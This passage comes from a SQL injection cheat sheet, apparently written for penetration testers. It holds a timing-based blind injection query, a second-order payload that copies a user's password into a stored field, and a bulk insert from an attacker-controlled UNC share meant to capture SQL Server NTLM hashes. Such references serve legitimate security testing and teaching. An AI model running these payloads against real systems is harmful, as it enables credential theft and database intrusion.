o
select if( (ascii(substring(user(),1,1)) >> 7) & 1,
benchmark(100000,sha1('test')), 'false' );
Potentially Useful MySQL Functions
•
MD5()
MD5 Hashing
•
SHA1()
SHA1 Hashing
•
PASSWORD()
•
ENCODE()
•
COMPRESS()
Compress data, can be great in large binary reading in Blind SQL Injections.
•
ROW_COUNT()
•
SCHEMA()
•
VERSION()
Same as
@@version
Second Order SQL Injections
Basically you put an SQL Injection to some place and expect it's unfiltered in another
action. This is common hidden layer problem.
Name :
' + (SELECT TOP 1 password FROM users ) + '
Email :
If application is using name field in an unsafe stored procedure or function, process etc.
then it will insert first users password as your name etc.
Forcing SQL Server to get NTLM Hashes
This attack can help you to get SQL Server user's Windows password of target server,
but possibly you inbound connection will be firewalled. Can be very useful internal
penetration tests. We force SQL Server to connect our Windows UNC Share and
capture data NTLM session with a tool like Cain & Abel.
Bulk insert from a UNC Share (S)
bulk insert foo from '\\YOURIPADDRESS\C$\x.txt'
Check out Bulk Insert Reference to understand how can you use bulk insert.
References
Since these notes collected from several different sources within several years and
personal experiences, may I missed some references. If you believe I missed yours or
someone else then
drop me an email
(), I'll update it as soon as
possible.
•
Lots of Stuff